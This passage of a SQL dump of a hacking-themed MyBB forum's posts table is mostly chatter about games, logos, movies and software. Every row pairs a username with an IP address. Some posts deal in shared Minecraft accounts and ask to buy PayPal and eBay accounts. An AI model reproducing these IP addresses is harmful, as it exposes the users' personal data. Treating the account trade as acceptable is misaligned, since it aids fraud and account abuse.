'0d9c89f230f1b8f241db903ab52b837f', '0', '0'); INSERT INTO mybb_posts VALUES('4662', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350252227', 'I am level 4. Some retard tried to troll me. He said want 200000 coins I am like lol sure he is like click crtl+w me not being a retard knew what it was and was like fack you. Lol.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '9029c22f92010596ea4ca1d4476a6681', '0', '0'); INSERT INTO mybb_posts VALUES('4663', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350252533', 'Lol. I sometimes mean to press Shift (Left Shift) and press W... And I press Ctrl + W -.-\n\nToki The ArchAngel..\n\nI\'m botting it now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f2228e875bc04c7739f1f41d9e87afb', '0', '0'); INSERT INTO mybb_posts VALUES('4664', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350252905', 'Lol nice, I saw that on the page.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '89d1125276927aa3866f6ae44a20cc2f', '0', '0'); INSERT INTO mybb_posts VALUES('4665', '862', '4610', '71', 'RE: Mount and Blade 2 BannerLord', '0', '254', 'Greed', '1350252970', 'Yeah, it\'s pretty awesome game to me. It\'s on my greatest game list for me anyways can\'t wait for it to come out.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '1f6096b2d17b593b51a3e36ebac4634d', '0', '0'); INSERT INTO mybb_posts VALUES('4666', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253143', 'What page? \n\nDid you see Toki\'s character page? Nothing new. Just some junk I got rid of...\nKinda accidentally deleted some Member shit that was a collectible..\nI didn\'t know -.-\n\nFML', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1dbfab0f9b879123056aa082c20b1215', '0', '0'); INSERT INTO mybb_posts VALUES('4667', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253497', 'not the char page,but go to the book of lore click badge and click on one of the badges then open the store.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '9947c6ed9981211a7e7c4b31fd43f959', '0', '0'); INSERT INTO mybb_posts VALUES('4668', '829', '4667', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253535', '[quote=\'Greed\' pid=\'4667\' dateline=\'1350253497\']\r\nnot the char page,but go to the book of lore click badge and click on one of the badges then open the store.\r\n[/quote]\r\n\r\nThat\'s how I get the DF thing?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '649c778cfcee20ef5dc255bf5bc11244', '0', '0'); INSERT INTO mybb_posts VALUES('4669', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253695', 'no the collectable stuff you deleted', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'cfe9e461f68d0aad7a3ae6ea4ff73a9a', '0', '0'); INSERT INTO mybb_posts VALUES('4670', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253923', 'Oh. I thought you meant the DF items. So I was looking for it :p\n\n\nAnd the collectible items, yeah I just got them again. Thanks. Will they be there forever or something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edf79e095452b1a71b0a68fca09de364', '0', '0'); INSERT INTO mybb_posts VALUES('4671', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253979', 'yeah lol, their badges there not going away.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'ce0c893d10b6e896babd132cb40d2ea5', '0', '0'); INSERT INTO mybb_posts VALUES('4672', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254316', 'I swear there was a badge for linking a DF account to the AQW account..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6782cd937b4790f3c5537f3263ed0e39', '0', '0'); INSERT INTO mybb_posts VALUES('4673', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350254405', 'nope lol, I checked all the badges and what not lol, just gotta wait til the event is done.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '9d36b78e486b835ea1d62b74f47eda9a', '0', '0'); INSERT INTO mybb_posts VALUES('4674', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254470', 'I found it.\nIt was in the Book of Lore.\nA.E. Section.\n\nBut I can\'t go to the place because it\'s a black screen due to the event... \n\nGotta wait till event ends. FML', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89354ef446dc11560b7e49bfe50903f2', '0', '0'); INSERT INTO mybb_posts VALUES('4675', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350254559', 'so what lvl are you and how much gold you got? lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '65fe74e6ee598a9501882189c8271361', '0', '0'); INSERT INTO mybb_posts VALUES('4676', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350254625', '[img]http://i.imgur.com/kyWbG.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0ee073b5d286afb426a7637c453d4c7d', '0', '0'); INSERT INTO mybb_posts VALUES('4677', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '262', 'RAND0M1ZER', '1350259163', 'I know C/C++, VisualBasic, PHP, HTML, CSS, and Java.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '7bb8f9b9257d9a5fb481e249071e910f', '0', '0'); INSERT INTO mybb_posts VALUES('4678', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350259524', 'yeah i want to say l33T on it and you can choose the colurs', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '694c66034bfaf7331a9e9117a72c56d2', '0', '0'); INSERT INTO mybb_posts VALUES('4679', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '257', 'XxTREYZxX', '1350259799', 'hey yeah i\'m interested in one if you don\'t mind.\npm\'ing you now', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '669f629aa54314812ea95f389a74c85b', '0', '0'); INSERT INTO mybb_posts VALUES('4680', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350259862', 'Forum Colors good?\n\nGreen + Black?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1909d5de00e4724a1756ba13f39d45f', '0', '0'); INSERT INTO mybb_posts VALUES('4681', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350260056', 'yeah thats fine its up to you.\r\nyou are the graphics beast (LOL).\r\nand thanks alot for actually helping me out.', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '8bf53c910606e10f809ae7b1632b25f7', '0', '0'); INSERT INTO mybb_posts VALUES('4682', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350260241', 'i dont have skype sorry i will create one though when i go to my dads (sorry)', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '9ddaacc252d2ade71489e60989f1c025', '0', '0'); INSERT INTO mybb_posts VALUES('4683', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350261431', 'It\'s ok. I sent you a working account.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84c3297c83229b78fcb35fc08f996acd', '0', '0'); INSERT INTO mybb_posts VALUES('4684', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350261458', 'No I\'m not..\nReloadzor is. :)\nNice try though :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa06300557514b687b3281a5bdd99916', '0', '0'); INSERT INTO mybb_posts VALUES('4685', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350261538', 'Nice...hopefully we can reach all of these milestones quickly :d', '74.76.76.132', '1246514308', '1', '0', '222', '1350261687', '1', '89726f719cb79a0a3f94da9880a8a1d0', '0', '1350261687'); INSERT INTO mybb_posts VALUES('4686', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '222', 'Exposé', '1350261738', 'Nice...i\'m pretty sure I voted :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'fe8f3347166ed4936763a8ab64177d91', '0', '0'); INSERT INTO mybb_posts VALUES('4687', '865', '0', '73', 'that great app series 1', '0', '257', 'XxTREYZxX', '1350261994', 'hello L33T\nand welcome to that great app series 1, game 1\nand the app today isssss subway surfers, subway surfers is this fast paced running like temple run but you actually getting chased by a security guard weaving, dodging, jumping, jet packing this game is fun and competitive, upgrades are available to buy at the shop for example head starts, and super boots. head starts are a item which boosters you a certain amount of score and super boots allow you to jump really high. you can also buy other characters to make your game just that little bit funner. hope you enjoy this game.\nbe back tomorrow with another great game.\npost yes and why if i should keep continuing this series and post no and why if you do not want this series to keep going, thanks and hope you enjoy.', '203.104.11.43', '-882373845', '1', '0', '257', '1350279585', '1', '44f0056e8ef436ef14d44e5ca6f4541f', '0', '1350279585'); INSERT INTO mybb_posts VALUES('4688', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350262197', 'are you still going to make that logo for me', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8b0dfad8062463b3319ba2c0465e4f0b', '0', '0'); INSERT INTO mybb_posts VALUES('4689', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350262295', 'thanks am i allowed change the password and stuff or is it local.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'd9e6a8bae30ff9b38c75fc3bd43cfdb4', '0', '0'); INSERT INTO mybb_posts VALUES('4690', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350262421', 'damm im not on that list, ill keep on active and will hopefully get on that list', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'd2b2cf915e7adc73db895d70af60ccd6', '0', '0'); INSERT INTO mybb_posts VALUES('4691', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350262928', 'You\'re allowed to change it and stuff. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8938a4ee9d38d27592c0d61014df43e9', '0', '0'); INSERT INTO mybb_posts VALUES('4692', '866', '0', '7', 'Anyone trade paypal for a DC?', '0', '222', 'Exposé', '1350262958', 'I am trying to purchase a domain costing 65 euros (or 89$) with my DC and it is not accepting it. So I need someone with 89$ or more to trade the paypal for my DC. I can have you tv me and I will show proof.\r\n\r\nIf anyone can help me that would be great!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50852e440402e1d437f12a2a695a19a3', '0', '0'); INSERT INTO mybb_posts VALUES('4693', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350262964', 'What list are you guys talking about? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97f1e9f62da28d48772afe434dc452de', '0', '0'); INSERT INTO mybb_posts VALUES('4694', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350262988', 'Voted again. :)\nKeep it up. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce1530d611cc1068e30330a3501997ba', '0', '0'); INSERT INTO mybb_posts VALUES('4695', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263018', 'I will. I\'m just busy doing my homework right now.\nI have school tomorrow too.\nJust wait please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43f9e15fd6ba1bcc63900710c7d5b3fa', '0', '0'); INSERT INTO mybb_posts VALUES('4696', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350263314', 'yeah ok i just got a little bit scared hahah Lol thanks so much', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5822227d5e936f02243bc0508b3a6e8a', '0', '0'); INSERT INTO mybb_posts VALUES('4697', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263403', 'It\' ok.\nNo problem.\nI don\'t scam people. Don\'t worry. I\'m trusted too. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b257d3f93668cfca95ebc9dd2d2d5d51', '0', '0'); INSERT INTO mybb_posts VALUES('4698', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350263558', 'ok thanks so much. really appreciated', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0bd805218bd2a8b0a48d0ce8bd2f60bb', '0', '0'); INSERT INTO mybb_posts VALUES('4699', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350263689', 'You\'re welcome :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dfe0fb50335c14b4147f72209aa429c7', '0', '0'); INSERT INTO mybb_posts VALUES('4700', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350263898', 'sweet, why are you the best member ever?', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8dae5316aadf5d6768f7492896923e94', '0', '0'); INSERT INTO mybb_posts VALUES('4701', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350264078', 'You\'re welcome :)\n\nIt\'s because I\'m the best member.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48f9900838d3194ec2e288d177bab7ab', '0', '0'); INSERT INTO mybb_posts VALUES('4702', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350264154', 'haha lol keep up the good work and you could be MOTM if they have going still', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '72385891a7573176655cd4306c3f8dfc', '0', '0'); INSERT INTO mybb_posts VALUES('4703', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350264271', 'the ten active users on l33T', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '1132dd14ac1a94118117574a5675d679', '0', '0'); INSERT INTO mybb_posts VALUES('4704', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '2', 'Apathy', '1350264273', 'I know your age. :3 but I know HTML, learning python and vb.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'efceb0ee4ae13d80a4fdc8ed15e6658e', '0', '0'); INSERT INTO mybb_posts VALUES('4705', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '2', 'Apathy', '1350264344', 'Nice to see those achievements. :) It should only get better.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', 'de9df27ab7e3e768fb1b7bd7073fa4d7', '0', '0'); INSERT INTO mybb_posts VALUES('4706', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350264504', 'What are you botting with? I might bot for a little. :3', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '527b79197b901da16c5e75afe9db307c', '0', '0'); INSERT INTO mybb_posts VALUES('4707', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '2', 'Apathy', '1350264574', 'I might give it a go. :)', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '0da865c0871ea197bf357225c24fd403', '0', '0'); INSERT INTO mybb_posts VALUES('4708', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350264760', 'yeah alright even though i\'v already got some one doing, give it ago and ill see which one is better', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'af96b9d241b0d042dcca36ed0b55d497', '0', '0'); INSERT INTO mybb_posts VALUES('4709', '867', '0', '71', 'Fifa 13', '0', '257', 'XxTREYZxX', '1350266621', 'hey l33T users, just wondering who\'s getting fifa 13', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1634244a871adf754bcb4b5e47c05ad6', '0', '0'); INSERT INTO mybb_posts VALUES('4710', '868', '0', '71', 'whats the best COD', '0', '257', 'XxTREYZxX', '1350266862', 'hey l33T users whats up, just wondering whats the best cod!', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'e72c45d5ab1769076e6cb93a7941be6c', '0', '0'); INSERT INTO mybb_posts VALUES('4711', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '205', 'mothered', '1350267563', 'This Is certainly a great Idea Indeed. \r\n\r\nNice that you\'ve stickied It too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f729810e23357d8c0d1580347009fe5b', '0', '0'); INSERT INTO mybb_posts VALUES('4712', '869', '0', '74', 'who loves counter strike', '0', '257', 'XxTREYZxX', '1350267665', 'hey l33T users and today i just wanna \r\nsay who loves counter strike because \r\ni know i do i thinks its great.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '08af673eed2fb4982fb152984b40eb53', '0', '0'); INSERT INTO mybb_posts VALUES('4713', '870', '0', '74', 'Great minecraft pvp <JOIN> -150 slots', '0', '257', 'XxTREYZxX', '1350267872', 'hey l33T users and today im going to be telling you \r\na great pvp server which is a archer games, you can\r\nchoose your , earn money by winning and voting, buying stuff\r\nthe ip:ag1.playeoe.com you can change the number to 1 -9 for a new map, host and server, hope you enjoy. tell me if you like it \r\nthanks :angel:', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '157d920b2f49bfc9d6e27f260294ca13', '0', '0'); INSERT INTO mybb_posts VALUES('4714', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '205', 'mothered', '1350267965', 'Thanks R?????zo?, appreciate the comment.\r\n\r\nIt\'s used as a test lappy, and must say, that It does perform quite well. The first thing I did, was get rid of all the OEM crap that was pre-Installed. I hit a clean Installation of Windows (deleted all existing partitions, and Installed on the Unallocated disk space), Installed the latest drivers, and It runs like a dream.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '10430318d34eb8031735ef6f4ed87d10', '0', '0'); INSERT INTO mybb_posts VALUES('4715', '871', '0', '65', 'What\'s Your Top 3 Movies?', '0', '205', 'mothered', '1350268067', 'Greetz to all,\r\n\r\nSo what are the best 3 movies you\'ve seen?\r\nMine (not respectively):\r\n\r\n1. Taken (Liam Neeson)\r\n2. Ransom (Mel Gibson)\r\n3. Killer Elite (Jason Statham)\r\n\r\nI\'m not really Into comedies. To watch a comedy, It\'ll have to be a 9/10 rating.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '58f0b2f2ea410c8f1ed906d4277127e2', '0', '0'); INSERT INTO mybb_posts VALUES('4716', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '257', 'XxTREYZxX', '1350268138', 'nice laptop, it also looks nice:)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '92347cf7b08132d1261bead6cd276eb9', '0', '0'); INSERT INTO mybb_posts VALUES('4717', '872', '0', '24', 'Windows Updates, who uses It?', '0', '205', 'mothered', '1350268175', 'Hello to all,\r\n\r\nWell, I\'ve come across a lot of users who disagree with what I\'m about to document. \r\nIn my views, I believe Windows Updates Is just a load of trash. There\'s been quite a few times whereby upon performing an update(s), It corrupted my system and/or some loss of functionality. All I\'m Interested In Is booting up my lappy and getting on with my work, and not wait for \"Installing updates, please wait.......Don\'t turn off your computer.........10% done........15%done.....\" then wait again for the configuration process.\r\nI haven\'t performed an update on all 7 lappies for 6 years, and all Is running fine. Any security, patches, fixes, etc, are Installed by myself, so I really don\'t need some useless crap that slows me down.\r\n\r\nIt\'ll be Interesting to read your thoughts...', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6b0580e8be85b0b44416fab5fc772701', '0', '0'); INSERT INTO mybb_posts VALUES('4718', '873', '0', '7', 'What do you think of Facebook?', '0', '205', 'mothered', '1350268348', 'Greetings everyone.\r\n\r\nAs the thread\'s title reads, what do you guys think of Facebook? There\'s no right or wrongs here, and It\'s totally Impartial and unbiased, so be honest with your answer.\r\n\r\nI reckon It\'s the biggest load of trash ever to hit the net. I can\'t fathom why a given person would upload their photos, and share their personal details with the rest of the world to see. Just ridiculous.\r\n\r\nYour thoughts?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3a23e7ae4f2b9d8a43b74cf87e294d3b', '0', '0'); INSERT INTO mybb_posts VALUES('4719', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '257', 'XxTREYZxX', '1350268562', 'my thought is its great (my opinion) because you can see whats others are doing you can laugh at people\'s selfies but on the other hand who would wanna post their details (what noobs) i did some fake info', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '41044b2e4b2f6bcce0fdd2b1ecd46142', '0', '0'); INSERT INTO mybb_posts VALUES('4720', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '257', 'XxTREYZxX', '1350268661', 'yeah i do the updates just because i dont really care, i will just buy another one haha lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '945f90d7837336d3e9fbac723cf4a36b', '0', '0'); INSERT INTO mybb_posts VALUES('4721', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '205', 'mothered', '1350268747', 'I\'m terrible at graphics, and this guide will certainly be of great benefit.\r\n\r\nThanking you :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '569012f821dacf9add8290adbeb2f312', '0', '0'); INSERT INTO mybb_posts VALUES('4722', '874', '0', '7', 'N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350268816', 'hey LH,\r\ndid anyone see that smart little cookie who hacked N.A.S.A. the goverment are stupid there waiting for him to come out of his hiding place when they could be hiring him to do some good work with them.lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '5f20760d76d0bf3ae2c526e50fd8f15e', '0', '0'); INSERT INTO mybb_posts VALUES('4723', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '257', 'XxTREYZxX', '1350269021', '1. the dictator \n2. super bad\n3.zombie land', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'cdd260e65784ce42bd5ecc96581ee177', '0', '0'); INSERT INTO mybb_posts VALUES('4724', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '82', 'iTzIpod', '1350271565', '1. 21 Jump Street\r\n2. Tranformers: Some Dark Moon shit\r\n3. The Amazing Spiderman 3D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3030929e224231ec40a6ca3b47671902', '0', '0'); INSERT INTO mybb_posts VALUES('4725', '619', '4721', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350271825', '[quote=\'mothered\' pid=\'4721\' dateline=\'1350268747\']\r\nI\'m terrible at graphics, and this guide will certainly be of great benefit.\r\n\r\nThanking you :)\r\n[/quote]\r\n\r\nNo problem! You\'re welcome. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f1e3c6293facc64948bc83581dc4daf2', '0', '0'); INSERT INTO mybb_posts VALUES('4726', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1350272664', 'Lol off course because you\'re my best friend online (No homo) and isn\'t Python hard to learn?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b8f0c347655916061a6810cf349a341f', '0', '0'); INSERT INTO mybb_posts VALUES('4727', '861', '4711', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350272728', '[quote=\'mothered\' pid=\'4711\' dateline=\'1350267563\']\r\nThis Is certainly a great Idea Indeed. \r\n\r\nNice that you\'ve stickied It too.\r\n[/quote]\r\n\r\nThanks I also wanted to add sites that we need to beat but didn\'t release them because someone might DDoS them.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dcc6709cb56afccb729598ca8fe90310', '0', '0'); INSERT INTO mybb_posts VALUES('4728', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '1', 't3h jok3r', '1350272804', 'Lol NASA gets Hacked every 2nd month, no new thing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b27e61e5258ab4e5e7ff9429eeca5f30', '0', '0'); INSERT INTO mybb_posts VALUES('4729', '868', '4710', '71', 'RE: whats the best COD', '0', '1', 't3h jok3r', '1350272854', 'I think Black OPs or MW3.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7757570cdc7e4f398730517e338746bd', '0', '0'); INSERT INTO mybb_posts VALUES('4730', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350272915', 'LIARS!!!!!!\n\nIf you all voted then why did the number only increase by 2 votes?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a102b4e0d08c339c2e2d5bb1cf2ac9ac', '0', '0'); INSERT INTO mybb_posts VALUES('4731', '496', '4619', '14', 'RE: Free Proxy List', '0', '1', 't3h jok3r', '1350272995', '[quote=\'iTzIpod\' pid=\'4619\' dateline=\'1350225059\']\r\nt3h jok3r. Give me you Adf.ly bot. -.-\r\n\r\nI need money too you know?\r\n[/quote]\r\n\r\nSure, I downloaded it from somewhere and got 4 bots but I only extracted and use one. I can send a download link to all of them if you want.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8f22fb090a1a733a289674555c86145b', '0', '0'); INSERT INTO mybb_posts VALUES('4732', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '5', 'Timmy', '1350273992', 'There\'s action after 10-15 minutes everytime.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b04e55de4584f9fea5e516374138023', '0', '0'); INSERT INTO mybb_posts VALUES('4733', '821', '4578', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350274047', '[quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\']\r\nLol Greed.\r\n\r\nOT: I\'m thinking if I should drink water now or after I\'m done checking my emails.\r\n[/quote]\r\n\r\nThis right here is the best answer on this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4750343679631c5cc2ede5cb47bc4af8', '0', '0'); INSERT INTO mybb_posts VALUES('4734', '496', '2408', '14', 'RE: Free Proxy List', '0', '5', 'Timmy', '1350274368', 'Nice list, long and all working.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '249170d45989e2f17eec39607f9d8ee4', '0', '0'); INSERT INTO mybb_posts VALUES('4735', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '5', 'Timmy', '1350274398', 'This is the 8th time I saw NASA get hacked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd114e6f123a1cc3d9dcc5471562ba74', '0', '0'); INSERT INTO mybb_posts VALUES('4736', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '5', 'Timmy', '1350274462', 'I\'m not really sure and can\'t remember but off the head I would say Fast and the Furious, Resident Evil and James Bond movies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0ecd54d95705bb25bea631d9db5e81f2', '0', '0'); INSERT INTO mybb_posts VALUES('4737', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '5', 'Timmy', '1350274830', 'What exactly are your referring to?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f27871d78b6d57d29a8ac419c161ad0', '0', '0'); INSERT INTO mybb_posts VALUES('4738', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '5', 'Timmy', '1350274891', 'My thought it\'s a good website to communicate but misused a lot and a site for kids now. People now use texting, BBM and other instant messengers which totally dominated FB in my opinion. FB is a useless site but good for advertising.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9bb15db84b20bc86c5c4a519245c60ef', '0', '0'); INSERT INTO mybb_posts VALUES('4739', '875', '0', '3', 'New LH Avatars', '0', '1', 't3h jok3r', '1350275816', 'I have been working on a couple of new unique avatars for L33T Hacking and today I\'m finally done with it. Here is one of the Avatars, I will update and post the others later. I originally made this iTzIpod but he doesn\'t seem to like it so feel free to take it :D\r\n\r\n[img]http://l33thavatars.netne.net/avatar/[/img]\r\n\r\nKeep refreshing the page and look at the new images in one avatar. \r\n\r\nSo basically everytime someone refreshes the page you have a new avatar but all the avatars are in one image.\r\n\r\nRate the above avatar. 0-10 (0 sucks, 10 mind blowing)\r\n\r\n[b]Pack 1[/b]\r\n\r\n[spoiler]\r\n[img]http://l33thavatars.netne.net/avatar/[/img]\r\n\r\n[img]http://l33thavatars.netne.net/penguins[/img]\r\n\r\n[img]http://l33thavatars.netne.net/money/[/img]\r\n\r\n[img]http://l33thavatars.netne.net/animals/[/img]\r\n\r\nHope you like them. Suggest more below.\r\n\r\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1350336574', '1', '22f0d70ba62fb24b7857ce351a15eaad', '0', '1350336574'); INSERT INTO mybb_posts VALUES('4740', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350275949', 'Why are they all of ipods or mp3 players?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '39ccaf2c7bfeac80c10e14aab27c2115', '0', '0'); INSERT INTO mybb_posts VALUES('4741', '875', '4740', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350276047', '[quote=\'ƒ???????????g\' pid=\'4740\' dateline=\'1350275949\']\r\nWhy are they all of ipods or mp3 players?\r\n[/quote]\r\n\r\nAs I said I made for iTzIpod so I made it related to his username and his interest, but others won\'t be only of Apple.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8d1246666fccb876c71fcdd23582282', '0', '0'); INSERT INTO mybb_posts VALUES('4742', '876', '0', '7', 'Anyone have a paypal + ebay I can buy off you?', '0', '222', 'Exposé', '1350276079', 'I am in need of a paypal + ebay account that has decent rep. Not alot but pretty good. Willing to pay a good price for it...just tell me how much and 